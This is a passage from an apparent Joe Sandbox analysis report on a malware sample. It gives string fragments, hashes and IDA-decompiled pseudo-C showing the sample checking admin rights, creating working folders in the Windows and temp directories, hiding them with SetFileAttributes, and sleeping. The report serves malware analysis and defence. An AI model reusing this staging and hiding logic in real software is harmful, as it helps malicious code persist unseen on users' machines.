eep, xrefs: 003872CA
(9|', xrefs: 003893B7, 003893CE
2.dl, xrefs: 0038729D
Kern, xrefs: 003873EF, 003873F4
A, xrefs: 0038730F
SetEve, xrefs: 003876B4, 003876B7
`5<, xrefs: 003893C3
l3, xrefs: 003872B2
ct, xrefs: 0038725F
CreateThread, xrefs: 00387502, 00387505
Hl, xrefs: 003882B7, 003882C4, 00388A28, 00388A58
t, xrefs: 00387250
59<, xrefs: 00387D82, 003881A4, 003882CD
Y/|, xrefs: 00387E69
WaitForSingleObj, xrefs: 0038776D, 00387773
n, xrefs: 00387265
l, xrefs: 003872F1
Sl, xrefs: 003872D7
vent, xrefs: 003872AB
eE, xrefs: 003872E4
CloseHandSetEve, xrefs: 003879D6, 003879D9
Creat, xrefs: 0038742E, 00387431

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: AddressProc$ChangeCloseCreateFindHandleModuleNotificationThread_memset
String ID: (9|'$2.dl$59<$A$CloseHandSetEve$Creat$CreateThread$Hl$Kern$SetEve$Sl$WaitForSingleObj$Y/|$`5<$ct$eE$eep$l$l3$n$t$vent
API String ID: 3301306101-3838946037
Opcode ID: 9dfe880e00689881f8fbc153da39d0e227927d7c42be17003b6143d08f360505
Instruction ID: bc70cf639e91e088601c4fe106e3fc6143c05d4add5d315706ec650446a4bd65
Opcode Fuzzy Hash: 9dfe880e00689881f8fbc153da39d0e227927d7c42be17003b6143d08f360505
Instruction Fuzzy Hash: FA138F74801669CBDB07AF62FD889A97F7CFB88311F524895C480E22B8DB3975B0DB45

Uniqueness

Uniqueness Score: -1.00%

Function 003852E0 Relevance: 30.4, APIs: 15, Strings: 2, Instructions: 631
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E003852E0(signed int __fp0) {
				signed int _v12;
				intOrPtr _v16;
				long long _v20;
				char _v24;
				long long _v28;
				char _v56;
				char _v313;
				char _v316;
				void* __edi;
				void* __esi;
				signed int _t121;
				intOrPtr _t125;
				void* _t133;
				void* _t135;
				unsigned int _t136;
				void* _t141;
				signed char _t142;
				void* _t145;
				unsigned int _t146;
				void* _t154;
				void* _t156;
				intOrPtr _t165;
				void* _t167;
				unsigned int _t168;
				void* _t173;
				void* _t177;
				unsigned int _t178;
				void* _t187;
				intOrPtr* _t189;
				void* _t192;
				void* _t193;
				void* _t197;
				unsigned int _t198;
				void* _t210;
				void* _t212;
				void* _t214;
				short _t217;
				short _t225;
				void* _t227;
				intOrPtr _t228;
				void* _t229;
				unsigned int _t230;
				void* _t235;
				short _t238;
				void* _t240;
				void* _t241;
				void* _t242;
				void _t243;
				void _t244;
				void _t249;
				void _t250;
				signed int _t252;
				char _t257;
				intOrPtr _t258;
				void* _t262;
				void _t263;
				signed int _t265;
				int _t268;
				signed int _t272;
				signed int _t275;
				void _t276;
				void _t277;
				signed int _t279;
				char _t284;
				intOrPtr _t285;
				void* _t287;
				void _t288;
				signed int _t290;
				int _t293;
				intOrPtr _t299;
				char _t300;
				void _t301;
				void _t302;
				signed int _t304;
				int _t307;
				intOrPtr _t309;
				char _t314;
				void* _t315;
				void _t317;
				signed int _t319;
				int _t322;
				void* _t329;
				void _t330;
				signed int _t332;
				void* _t337;
				void _t339;
				signed int _t341;
				void* _t347;
				void _t351;
				intOrPtr _t354;
				void* _t358;
				void _t360;
				void* _t362;
				void* _t366;
				signed int _t367;
				short _t368;
				void _t370;
				void* _t372;
				signed int _t373;
				void* _t375;
				void* _t381;
				void* _t385;
				void* _t387;
				void* _t393;
				void* _t398;
				void* _t403;
				void* _t408;
				void* _t414;
				void* _t420;
				void* _t421;
				void* _t424;
				void* _t425;
				void* _t427;
				void* _t429;
				void* _t430;
				void* _t431;
				void* _t432;
				void* _t435;
				void* _t436;
				void* _t438;
				void* _t440;
				void* _t445;
				void* _t448;
				void* _t450;
				void* _t452;
				void* _t458;
				void* _t463;
				void* _t466;
				void* _t469;
				void* _t472;
				int _t519;
				signed int _t520;
				long long _t522;
				signed int _t525;
				signed long long _t527;

				_t520 = __fp0;
				_t121 =  *0x3ce264; // 0x80000000
				 *0x3ce264 = _t121 * 0x3502a1b;
				E00389630( &_v56);
				_t239 = 0;
				_v24 = 0;
				0x3d0768->dwOSVersionInfoSize = 0x94;
				GetVersionExA(0x3d0768); // executed
				_t125 = E00391CA0(); // executed
				 *0x3d0744 = _t125;
				 *0x3d04ec = E003866A0(_t520);
				_t472 =  *0x3d0744 - _t239; // 0x1
				if(_t472 == 0) {
					_v316 = 0;
				} else {
					_t227 = E00399CC0( &_v316);
					_v12 =  *0x3ce540;
					 *((char*)(_t431 + _t227 - 0x138)) = 0x5c;
					_t466 = _t432 + 4;
					_t228 = _t227 + 1;
					 *((char*)(_t431 + _t228 - 0x138)) = 0;
					_v16 = _t228;
					asm("fsubr qword [ebp-0x8]");
					 *0x3ce540 =  *0x3ce198 -  *0x3c7fa0;
					_t229 =  *0x3cfc74; // 0x2d811b0
					_t552 =  *0x3ce198 +  *0x3c75c8;
					_t329 = _t229;
					 *0x3ce198 =  *0x3ce198 +  *0x3c75c8;
					do {
						_t370 =  *_t229;
						_t229 = _t229 + 1;
					} while (_t370 != 0);
					_t230 = _t229 - _t329;
					_t429 = _t329;
					_t408 =  &_v316 - 1;
					do {
						_t330 =  *(_t408 + 1);
						_t408 = _t408 + 1;
					} while (_t330 != 0);
					_t332 = _t230 >> 2;
					memcpy(_t429 + _t332 + _t332, _t429, memcpy(_t408, _t429, _t332 << 2) & 0x00000003);
					CreateDirectoryA( &_v316, 0); // executed
					_t337 = E0038CF90(memcpy(_t408, _t429, _t332 << 2) & 0x00000003, _t552, 0x22b4, 0x1f);
					_t469 = _t466 + 0x20;
					_t372 = _t337;
					do {
						_t244 =  *_t337;
						_t337 = _t337 + 1;
					} while (_t244 != 0);
					_t430 = _t372;
					_t373 = _t337 - _t372;
					_t414 =  &_v316 - 1;
					do {
						_t339 =  *(_t414 + 1);
						_t414 = _t414 + 1;
						_t480 = _t339;
					} while (_t339 != 0);
					_t341 = _t373 >> 2;
					_t235 = memcpy(_t414, _t430, _t341 << 2);
					memcpy(_t430 + _t341 + _t341, _t430, _t373 & 0x00000003);
					E00396570(0x1f, _t235);
					_t432 = _t469 + 0x20;
					_v12 =  *0x3ce050;
					_t520 =  *0x3ce578 + _v12 -  *0x3c7f98;
					_t238 = E0039CABC();
					_t239 = _v24;
					 *0x3ce048 = _t238;
				}
				E00398260( &_v56, _t520, E0038CF90(_t480, _t520, 0x1e44, 0x1f));
				E00396570(0x1f, _t127);
				_t133 = E0038A9D0(E00391FC0(E0038CEE0( &_v316),  &_v56), _t131,  &_v316, 0x181dd011); // executed
				_t435 = _t432 + 0x20;
				if(_t133 != 0) {
					_t239 = 1; // executed
					DeleteFileA( &_v316); // executed
					 *0x3ce1b8 =  *0x3ce1b8 -  *0x3ce5a0;
					_t520 =  *0x3ce5a0;
					 *((char*)(_t431 + _v16 - 0x138)) = 0;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce5a0 = _t520;
					_t225 =  *0x3ce5c4; // 0x7fffffff
					 *0x3ce28c = _t225;
					 *0x3ce5c4 =  *0x3ce5c4 - 1; // executed
					RemoveDirectoryA( &_v316); // executed
				}
				E00399CC0( &_v316);
				_t135 =  *0x3cfc74; // 0x2d811b0
				_t436 = _t435 + 4;
				_v313 = 0;
				_t347 = _t135;
				do {
					_t249 =  *_t135;
					_t135 = _t135 + 1;
				} while (_t249 != 0);
				_t136 = _t135 - _t347;
				_t375 =  &_v316 - 1;
				do {
					_t250 =  *(_t375 + 1);
					_t375 = _t375 + 1;
				} while (_t250 != 0);
				_t252 = _t136 >> 2;
				_t420 = _t347;
				memcpy(_t420 + _t252 + _t252, _t420, memcpy(_t375, _t420, _t252 << 2) & 0x00000003);
				_t438 = _t436 + 0x18;
				CreateDirectoryA( &_v316, 0); // executed
				_t141 = 0;
				do {
					_t257 =  *((intOrPtr*)(_t431 + _t141 - 0x138));
					 *((char*)(_t141 + 0x3d0328)) = _t257;
					_t141 = _t141 + 1;
				} while (_t257 != 0);
				if(_t239 == 0) {
					 *0x3d030c = _t239;
				}
				_t258 =  *0x3ce11c; // 0x760d9cf6
				_t142 =  *0x3ce5dc; // 0x12a4
				_v16 = 0x3bbf37ab - _t258;
				asm("fild dword [ebp-0xc]");
				_v16 = _t142 + 0x20a661a8;
				_v28 = _t520;
				asm("fild dword [ebp-0xc]");
				_v12 = _t520;
				 *0x3ce11c =  *0x3ce11c - 1;
				_t522 =  *0x3ce030 + _v12;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t489 = _t142 & 0x00000001;
				if((_t142 & 0x00000001) == 0) {
					_v12 =  *0x3ce138 +  *0x3c7f90;
					_t368 =  *0x3ce0bc; // 0xdec
					asm("fsubr qword [ebp-0x8]");
					_v16 = _t368;
					_v12 =  *0x3ce2c8;
					asm("fild dword [ebp-0xc]");
					 *0x3ce0bc = E0039CABC();
					asm("fld1");
					_t522 =  *0x3ce2c8 - st0;
					asm("fxch st0, st1");
					 *0x3ce2c8 = _t522;
					asm("fsubr qword [0x3ce138]");
					 *0x3ce138 = _t522;
				}
				E00396330(_t489,  &_v316);
				CreateDirectoryA( &_v316, 0); // executed
				_t145 = E0038CF90(_t489, _t522, 0x22b4, 0x1f);
				_t440 = _t438 + 0xc;
				_t240 = _t145;
				_t262 = _t145;
				do {
					_t351 =  *_t145;
					_t145 = _t145 + 1;
				} while (_t351 != 0);
				_t146 = _t145 - _t262;
				_t421 = _t262;
				_t381 =  &_v316 - 1;
				do {
					_t263 =  *(_t381 + 1);
					_t381 = _t381 + 1;
					_t492 = _t263;
				} while (_t263 != 0);
				_t265 = _t146 >> 2;
				_t268 = memcpy(_t381, _t421, _t265 << 2) & 0x00000003;
				memcpy(_t421 + _t265 + _t265, _t421, _t268);
				_t385 = _t421 + _t268 + _t268;
				 *0x3ce328 =  *0x3ce328 -  *0x3ce0b0;
				_t525 =  *0x3ce0b0;
				asm("fld1");
				asm("fsubp st1, st0");
				 *0x3ce0b0 = _t525;
				_t422 = E0038CF90(_t492, _t525, 0x1e44, 0x1f);
				E00396570(0x1f, _t240);
				E00398260( &_v56, _t525, _t149);
				E00396570(0x1f, _t149);
				_t154 = E0038CEE0( &_v316);
				_t272 =  &_v56;
				_t156 = E0038A9D0(E00391FC0(_t154, _t272), _t154,  &_v316, 0x181dd011); // executed
				_t445 = _t440 + 0x40;
				if(_t156 == 0) {
					_t494 =  *0x3d076c - 6;
					if( *0x3d076c < 6) {
						E0039E0C2( &_v316, 0x104, E0038CF90(__eflags, _t525, 0xf11, 0x24), "C:\\Users\\hardz");
						E00396570(0x24, _t162);
						_t275 = _t272 | 0xffffffff;
						 *0x3ce588 =  *0x3ce588 + _t275;
						_t165 =  *0x3ce588; // 0xb5d5
						_t354 =  *0x3ce31c; // 0xd3ba
						_v16 = _t354 - _t165 + 0x5001be30;
						_t448 = _t445 + 0x20;
						asm("fild dword [ebp-0xc]");
						_v12 = _t525;
						_t527 =  *0x3ce39c + _v12;
						 *0x3ce39c = _t527;
						 *0x3ce31c =  *0x3ce31c + _t275;
						__eflags =  *0x3ce31c;
					} else {
						E0039E0C2( &_v316, 0x104, E0038CF90(_t494, _t525, 0x219a, 0x12), "C:\\Users\\hardz");
						E00396570(0x12, _t219);
						_v12 =  *0x3ce314;
						_t448 = _t445 + 0x20;
						 *0x3ce314 =  *0x3ce450 * _v12;
						_t527 =  *0x3ce450 +  *0x3c75c8;
						 *0x3ce450 = _t527;
					}
					_t167 =  *0x3cfc74; // 0x2d811b0
					_t358 = _t167;
					do {
						_t276 =  *_t167;
						_t167 = _t167 + 1;
					} while (_t276 != 0);
					_t168 = _t167 - _t358;
					_t387 =  &_v316 - 1;
					do {
						_t277 =  *(_t387 + 1);
						_t387 = _t387 + 1;
					} while (_t277 != 0);
					_t279 = _t168 >> 2;
					_t424 = _t358;
					memcpy(_t424 + _t279 + _t279, _t424, memcpy(_t387, _t424, _t279 << 2) & 0x00000003);
					_t450 = _t448 + 0x18;
					CreateDirectoryA( &_v316, 0);
					_t173 = 0;
					do {
						_t284 =  *((intOrPtr*)(_t431 + _t173 - 0x138));
						 *((char*)(_t173 + 0x3d0328)) = _t284;
						_t173 = _t173 + 1;
					} while (_t284 != 0);
					_t285 =  *0x3ce460; // 0x6c98b0f1
					_v16 = _t285 + 0x47807ecd;
					asm("fild dword [ebp-0xc]");
					_v12 = _t527;
					_t529 =  *0x3ce218 * _v12;
					 *0x3ce218 =  *0x3ce218 * _v12;
					E00396330(_t285 + 0x47807ecd,  &_v316);
					CreateDirectoryA( &_v316, 0);
					_t177 = E0038CF90(_t285 + 0x47807ecd,  *0x3ce218 * _v12, 0x22b4, 0x1f);
					_t452 = _t450 + 0xc;
					_t241 = _t177;
					_t287 = _t177;
					do {
						_t360 =  *_t177;
						_t177 = _t177 + 1;
					} while (_t360 != 0);
					_t178 = _t177 - _t287;
					_t425 = _t287;
					_t393 =  &_v316 - 1;
					do {
						_t288 =  *(_t393 + 1);
						_t393 = _t393 + 1;
						_t503 = _t288;
					} while (_t288 != 0);
					_t290 = _t178 >> 2;
					_t293 = memcpy(_t393, _t425, _t290 << 2) & 0x00000003;
					memcpy(_t425 + _t290 + _t290, _t425, _t293);
					_t385 = _t425 + _t293 + _t293;
					_t422 = E0038CF90(_t503, _t529, 0x1e44, 0x1f);
					E00396570(0x1f, _t241);
					E00398260( &_v56, _t529, _t181);
					_t187 = E0038A9D0(E00391FC0(E0038CEE0(E00396570(0x1f, _t181)),  &_v56), _t185,  &_v316, 0x181dd011);
					_t445 = _t452 + 0x40;
					if(_t187 == 0) {
						GetTempPathA(0x104,  &_v316);
						_t189 =  &_v316;
						_t362 = _t189 + 1;
						do {
							_t299 =  *_t189;
							_t189 = _t189 + 1;
						} while (_t299 != 0);
						_t532 =  *0x3ce5ac -  *0x3c7f88 +  *0x3c7f84;
						 *0x3ce0c4 = E0039CABC();
						_t192 = _t189 - _t362 - 2;
						if(_t192 > 0) {
							while( *((char*)(_t431 + _t192 - 0x138)) != 0x5c) {
								_t192 = _t192 - 1;
								if(_t192 > 0) {
									continue;
								} else {
								}
								goto L50;
							}
							 *((char*)(_t431 + _t192 - 0x137)) = 0;
							_t217 =  *0x3ce294; // 0x5fbc
							_v16 = _t217;
							asm("fild dword [ebp-0xc]");
							_v20 = _t532;
							_v12 =  *0x3ce0f4;
							_v12 =  *0x3ce078 + _v12;
							asm("fsubr qword [ebp-0x8]");
							asm("fsubr qword [ebp-0x10]");
							 *0x3ce294 = E0039CABC();
							_t532 =  *0x3ce0f4;
							asm("fld1");
							asm("faddp st1, st0");
						}
						L50:
						_t193 = 0;
						do {
							_t300 =  *((intOrPtr*)(_t431 + _t193 - 0x138));
							 *((char*)(_t193 + 0x3d0328)) = _t300;
							_t193 = _t193 + 1;
							_t510 = _t300;
						} while (_t300 != 0);
						E00396330(_t510,  &_v316);
						CreateDirectoryA( &_v316, 0);
						_t197 = E0038CF90(_t510, _t532, 0x22b4, 0x1f);
						_t458 = _t445 + 0xc;
						_t242 = _t197;
						_t427 = _t197;
						do {
							_t301 =  *_t197;
							_t197 = _t197 + 1;
						} while (_t301 != 0);
						_t198 = _t197 - _t427;
						_t398 =  &_v316 - 1;
						do {
							_t302 =  *(_t398 + 1);
							_t398 = _t398 + 1;
							_t513 = _t302;
						} while (_t302 != 0);
						_t304 = _t198 >> 2;
						_t307 = memcpy(_t398, _t427, _t304 << 2) & 0x00000003;
						memcpy(_t427 + _t304 + _t304, _t427, _t307);
						_t385 = _t427 + _t307 + _t307;
						_t422 = E0038CF90(_t513, _t532, 0x1e44, 0x1f);
						E00396570(0x1f, _t242);
						 *0x3ce0f8 =  *0x3ce0f8 - 1;
						_t309 =  *0x3ce0f8; // 0x9257
						 *0x3ce340 = ( *0x3ce340 & 0x0000ffff) * (_t309 + 0xcf8a4054);
						E00398260( &_v56, _t532, _t201);
						E00396570(0x1f, _t201);
						_t210 = E0038A9D0(E00391FC0(E0038CEE0( &_v316),  &_v56), _t208,  &_v316, 0x181dd011);
						_t445 = _t458 + 0x40;
						if(_t210 == 0) {
							GetTempPathA(0x104,  &_v316);
							_t212 = 0;
							do {
								_t314 =  *((intOrPtr*)(_t431 + _t212 - 0x138));
								 *((char*)(_t212 + 0x3d0328)) = _t314;
								_t212 = _t212 + 1;
								_t515 = _t314;
							} while (_t314 != 0);
							_t315 = E0038CF90(_t515, _t532, 0x22b4, 0x1f);
							_t463 = _t445 + 8;
							_t366 = _t315;
							do {
								_t243 =  *_t315;
								_t315 = _t315 + 1;
							} while (_t243 != 0);
							_t422 = _t366;
							_t367 = _t315 - _t366;
							_t403 =  &_v316 - 1;
							do {
								_t317 =  *(_t403 + 1);
								_t403 = _t403 + 1;
							} while (_t317 != 0);
							_t319 = _t367 >> 2;
							_t214 = memcpy(_t403, _t422, _t319 << 2);
							_t322 = _t367 & 0x00000003;
							_t519 = _t322;
							memcpy(_t422 + _t319 + _t319, _t422, _t322);
							_t385 = _t422 + _t322 + _t322;
							E00396570(0x1f, _t214);
							_t445 = _t463 + 0x20;
						}
					}
				}
				E00396330(_t519,  &_v316);
				SetFileAttributesA( &_v316, 2); // executed
				E0039C990( &_v316, 0, 0x104);
				return E00393030( &_v56, _t385, _t422);
			}

0x003852e0
0x003852e9
0x003852fa
0x003852ff
0x00385304
0x0038530b
0x0038530e
0x00385318
0x0038531e
0x00385323
0x0038532d
0x00385332
0x00385338
0x00385449
0x0038533e
0x00385345
0x00385350
0x00385353
0x00385361
0x0038536a
0x0038536b
0x00385372
0x00385375
0x00385378
0x00385384
0x00385389
0x0038538f
0x00385391
0x00385397
0x00385397
0x00385399
0x0038539a
0x003853a4
0x003853a6
0x003853a8
0x003853b0
0x003853b0
0x003853b3
0x003853b4
0x003853ba
0x003853cd
0x003853cf
0x003853e1
0x003853e3
0x003853e6
0x003853e8
0x003853e8
0x003853ea
0x003853eb
0x003853f7
0x003853f9
0x003853fb
0x00385400
0x00385400
0x00385403
0x00385404
0x00385404
0x0038540a
0x0038540d
0x00385417
0x00385419
0x0038541e
0x00385427
0x00385433
0x00385439
0x0038543e
0x00385441
0x00385441
0x00385464
0x0038546c
0x00385492
0x00385497
0x0038549c
0x003854a5
0x003854aa
0x003854c6
0x003854cc
0x003854d2
0x003854da
0x003854dc
0x003854de
0x003854e4
0x003854e9
0x003854ef
0x003854f5
0x003854f5
0x00385502
0x00385507
0x0038550c
0x0038550f
0x00385516
0x00385518
0x00385518
0x0038551a
0x0038551b
0x00385525
0x00385527
0x00385528
0x00385528
0x0038552b
0x0038552c
0x00385532
0x00385535
0x00385547
0x00385547
0x00385549
0x0038554f
0x00385551
0x00385551
0x00385558
0x0038555e
0x0038555f
0x00385565
0x00385567
0x00385567
0x0038556d
0x00385573
0x00385583
0x0038558c
0x0038558f
0x00385592
0x00385595
0x00385598
0x003855a1
0x003855a7
0x003855aa
0x003855ad
0x003855af
0x003855b2
0x003855c0
0x003855c9
0x003855d0
0x003855d6
0x003855d9
0x003855dc
0x003855e7
0x003855f3
0x003855f5
0x003855f7
0x003855f9
0x003855ff
0x00385605
0x00385605
0x00385612
0x00385623
0x00385630
0x00385635
0x00385638
0x0038563a
0x00385640
0x00385640
0x00385642
0x00385643
0x0038564d
0x0038564f
0x00385651
0x00385652
0x00385652
0x00385655
0x00385656
0x00385656
0x00385668
0x0038566f
0x00385672
0x00385672
0x00385674
0x0038567a
0x00385680
0x00385682
0x00385684
0x00385699
0x0038569b
0x003856a7
0x003856af
0x003856c6
0x003856cc
0x003856d5
0x003856da
0x003856df
0x003856e5
0x003856ec
0x0038576a
0x00385772
0x00385777
0x0038577a
0x00385781
0x00385787
0x0038579a
0x0038579d
0x003857a0
0x003857a3
0x003857ac
0x003857af
0x003857b5
0x003857b5
0x003856ee
0x0038570e
0x00385716
0x00385721
0x00385724
0x00385730
0x0038573c
0x00385742
0x00385742
0x003857bc
0x003857c1
0x003857c3
0x003857c3
0x003857c5
0x003857c6
0x003857d0
0x003857d2
0x003857d3
0x003857d3
0x003857d6
0x003857d7
0x003857dd
0x003857e0
0x003857f2
0x003857f2
0x003857f4
0x003857fa
0x00385800
0x00385800
0x00385807
0x0038580d
0x0038580e
0x00385812
0x0038581e
0x00385821
0x0038582b
0x00385834
0x00385837
0x0038583d
0x0038584e
0x0038585b
0x00385860
0x00385863
0x00385865
0x00385867
0x00385867
0x00385869
0x0038586a
0x00385874
0x00385876
0x00385878
0x00385880
0x00385880
0x00385883
0x00385884
0x00385884
0x0038588a
0x00385891
0x0038589b
0x0038589b
0x003858a5
0x003858a7
0x003858b3
0x003858e1
0x003858e6
0x003858eb
0x003858fd
0x00385903
0x00385909
0x00385910
0x00385910
0x00385912
0x00385913
0x00385927
0x00385932
0x00385937
0x0038593c
0x00385940
0x0038594a
0x0038594d
0x00000000
0x00000000
0x0038594f
0x00000000
0x0038594d
0x00385951
0x00385959
0x00385962
0x00385965
0x00385968
0x00385971
0x0038597d
0x00385986
0x00385989
0x00385991
0x00385997
0x0038599d
0x0038599f
0x0038599f
0x003859a7
0x003859a7
0x003859b0
0x003859b0
0x003859b7
0x003859bd
0x003859be
0x003859be
0x003859c9
0x003859da
0x003859e7
0x003859ec
0x003859ef
0x003859f1
0x003859f3
0x003859f3
0x003859f5
0x003859f6
0x00385a00
0x00385a02
0x00385a03
0x00385a03
0x00385a06
0x00385a07
0x00385a07
0x00385a0d
0x00385a14
0x00385a1e
0x00385a1e
0x00385a28
0x00385a2a
0x00385a2f
0x00385a36
0x00385a56
0x00385a5d
0x00385a65
0x00385a8b
0x00385a90
0x00385a95
0x00385aa3
0x00385aa9
0x00385ab0
0x00385ab0
0x00385ab7
0x00385abd
0x00385abe
0x00385abe
0x00385ace
0x00385ad0
0x00385ad3
0x00385ad5
0x00385ad5
0x00385ad7
0x00385ad8
0x00385ae4
0x00385ae6
0x00385ae8
0x00385af0
0x00385af0
0x00385af3
0x00385af4
0x00385afa
0x00385afd
0x00385b02
0x00385b02
0x00385b07
0x00385b07
0x00385b09
0x00385b0e
0x00385b0e
0x00385a95
0x003858eb
0x00385b18
0x00385b29
0x00385b3d
0x00385b53

APIs

GetVersionExA.KERNEL32(003D0768,00000000,00000001,74CB4EE0), ref: 00385318

Part of subcall function 00391CA0: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00391D0E
Part of subcall function 00391CA0: CheckTokenMembership.KERNELBASE(00000000,?,#S8), ref: 00391D24
Part of subcall function 00391CA0: FreeSid.ADVAPI32(?), ref: 00391D35

Part of subcall function 003866A0: GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038673F
Part of subcall function 003866A0: GetCurrentProcess.KERNEL32(00000000), ref: 00386770

CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 003853CF
DeleteFileA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 003854AA
RemoveDirectoryA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 003854F5
CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,00000000), ref: 00385549

Part of subcall function 00399CC0: GetWindowsDirectoryA.KERNEL32(00385507,00000104,00000000,?,00385507,?,?,?,?,?,?,00000000), ref: 00399CDF

CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00385623
__snprintf.LIBCMT ref: 0038570E
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003857F4

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

__snprintf.LIBCMT ref: 0038576A

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

CreateDirectoryA.KERNEL32(?,00000000), ref: 0038584E
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 003858FD
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,00000000), ref: 003859DA
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 00385AA3
SetFileAttributesA.KERNELBASE(?,00000002,?,?,?,?,?,?,00000000), ref: 00385B29
_memset.LIBCMT ref: 00385B3D

Strings

\, xrefs: 00385940
C:\Users\user, xrefs: 003856FA, 00385756

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Directory$Create$FilePathTemp__snprintf_memset$AddressAllocateAttributesCheckCurrentDeleteFreeInitializeMembershipProcProcessRemoveTokenVersionWindows_free_malloc
String ID: C:\Users\user$\
API String ID: 489473072-2487628403
Opcode ID: 0686802a54c8b7fd850b2c350838db792c6f9db0b3737ac4fb83dd1ddb94ad3b
Instruction ID: ea3581b2cbf23deca9e46526e9dfec11854fcf49f5ff904766f241a9f7362cc4
Opcode Fuzzy Hash: 0686802a54c8b7fd850b2c350838db792c6f9db0b3737ac4fb83dd1ddb94ad3b
Instruction Fuzzy Hash: 4B3236719007099BDB16AB70FC56BEE7BB9FF45300F4044A4E986EB291EF316A54CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0038D840 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 214
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0038D840(long long __fp0) {
				char* _v8;
				long long _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v300;
				struct _WIN32_FIND_DATAA _v620;
				intOrPtr _t43;
				intOrPtr* _t48;
				char* _t50;
				void* _t51;
				unsigned int _t52;
				void* _t56;
				void* _t60;
				short _t61;
				void* _t64;
				unsigned int _t65;
				signed int _t66;
				short _t69;
				int _t71;
				void _t74;
				void* _t75;
				intOrPtr _t77;
				intOrPtr _t80;
				void* _t81;
				void _t82;
				signed int _t84;
				void* _t89;
				void _t91;
				signed int _t93;
				void* _t101;
				void _t102;
				signed int _t104;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void _t114;
				void* _t115;
				signed int _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				void _t119;
				void* _t124;
				void* _t130;
				void* _t137;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t154;
				void* _t157;
				long long _t179;
				long long _t183;
				long long _t187;
				long long _t196;

				_t43 =  *0x3ce38c; // 0x93fc1fee
				_v16 = _t43;
				asm("fild dword [ebp-0xc]");
				_v12 = __fp0;
				_t77 =  *0x3ce4a8; // 0x1d14
				_t179 =  *0x3ce1e4 + _v12;
				_v16 = _t77;
				_v12 = _t179;
				asm("fild dword [ebp-0xc]");
				asm("fsubr qword [ebp-0x8]");
				_v12 = _t179;
				 *0x3ce324 =  *0x3ce324 + _v12;
				 *0x3ce4a8 =  *0x3ce4a8 + 1;
				asm("fld1");
				asm("faddp st1, st0");
				if( *0x3d0478 == 0) {
					 *0x3ce544 = 0xffffd793;
					E0038A010(0x104,  &_v300);
					_t111 =  *0x3ce1c0; // 0xa815
					 *0x3ce03c =  *0x3ce03c + 0x9eda8769 - _t111;
					_t48 =  &_v300;
					_t151 = _t150 + 8;
					 *0x3ce1c0 =  *0x3ce1c0 + 1;
					_t112 = _t48 + 1;
					do {
						_t80 =  *_t48;
						_t48 = _t48 + 1;
					} while (_t80 != 0);
					_t183 =  *0x3ce190;
					_t113 =  *0x3ce47c; // 0xd2bf0292
					_v12 = _t183;
					_v16 = _t113;
					asm("fild dword [ebp-0xc]");
					asm("fsubr qword [ebp-0x8]");
					_v12 = _t183;
					 *0x3ce1b0 =  *0x3ce3e0 + _v12;
					_t187 =  *0x3ce3e0 +  *0x3c75c8;
					 *0x3ce3e0 = _t187; // executed
					Sleep(0x3e8); // executed
					_t50 = _t149 + _t48 - _t112 - 0x128;
					_v8 = _t50;
					 *_t50 = 0;
					_t51 =  *0x3d0494; // 0x2d81088
					_t81 = _t51;
					do {
						_t114 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t114 != 0);
					_t52 = _t51 - _t81;
					_t146 = _t81;
					_t124 =  &_v300 - 1;
					do {
						_t82 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t82 != 0);
					_t84 = _t52 >> 2;
					memcpy(_t146 + _t84 + _t84, _t146, memcpy(_t124, _t146, _t84 << 2) & 0x00000003);
					_t89 = E0038CF90(memcpy(_t124, _t146, _t84 << 2) & 0x00000003, _t187, 0x3bc, 2);
					_t154 = _t151 + 0x20;
					_t115 = _t89;
					do {
